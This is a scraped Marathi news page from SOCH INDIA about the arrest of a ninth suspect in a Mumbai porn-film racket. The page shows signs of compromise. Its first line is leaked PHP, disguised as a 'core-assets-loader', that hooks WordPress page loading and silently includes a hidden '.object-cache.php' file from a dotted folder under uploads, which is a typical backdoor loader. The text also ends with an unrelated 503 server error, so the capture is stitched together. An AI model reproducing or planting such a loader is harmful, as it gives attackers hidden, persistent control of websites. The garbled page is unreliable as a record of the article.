add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पॉर्न फिल्म रॅकेटचं गुजरात कनेक्शन : 40 वर्षीय युवकाला अटक – SOCH INDIA
Menu

देश
पॉर्न फिल्म रॅकेटचं गुजरात कनेक्शन : 40 वर्षीय युवकाला अटक

nobanner

पॉर्न फिल्म रॅकेटमध्ये दररोज नवनवी धक्कादायक माहिती समोर येत आहे. आता पॉर्न फिल्म रॅकेटचं गुजरात कनेक्शन समोर आलं आहे. प्रॉपर्टी सेलने तन्वीर हाश्मी या 40 वर्षीय युवकाला अटक केलं आहे. प्रॉपर्टी सेलने या प्रकरणात अटक केलेली ही नववी व्यक्ती आहे. तन्वीर हाश्मीला आज न्यायालयात हजर करण्यात येणार आहे.

याआधीच गेहना वशिष्ठ आणि उमेश कामत नावाच्या एका हायप्रोफाईल व्यक्तीला अटक केली आहे. या सेक्स रॅकेटचं जाळे परदेशातही पसरल असल्याची माहिती समोर आली आहे. उमेश हा देशातल्या खुप मोठ्या उद्योगपतीचा पीए होता. नोकरी गेल्यानंतर उमेश पॉर्नच्या धंद्यात शिरला. परदेशी ऍपला पॉर्न फिल्म विकून उमेश आणि गेहना कोट्यवधी रुपये कमावत होते.

मॉडेलला फसवून पॉर्न फिल्म बनवणा-या रॅकेटचा पर्दाफाश केल्यानंतर याच प्रकरणी मुंबई पोलिसांनी आणखी एक मोठा खुलासा केला आहे. अभिनेत्री गेहना वशिष्ठ नंतर आता उमेश कामत नावाच्या एका हायप्रोफाईल व्यक्तीला पोलिसांनी बेड्या ठोकल्या आहेत. या प्रकरणात धक्कादायक बाब म्हणजे उमेश कामत हा एका बड्या उद्योजकाचा पीए होता. त्यामुळे आता या प्रकरणात मोठी नावं समोर येणार की काय? अशी शंका व्यक्त केली जात आहे.

या पॉर्न फिल्मचे जाळे परदेशातही पसरल्याचे तपासात समोर आले आहे.उमेश हा देशातील खुप मोठ्या उद्योगपतीचा पीए होता. नोकरी गेल्यानंतर उमेश पॉर्नच्या धंद्यात शिरल्याचं म्हटलं जात आहे. परदेशी ऍपला पार्न फिल्म विकून उमेश आणि गेहना कोट्यवधी रुपये कमावत असल्याची माहिती पोलिसांच्या तपासात समोर आली आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.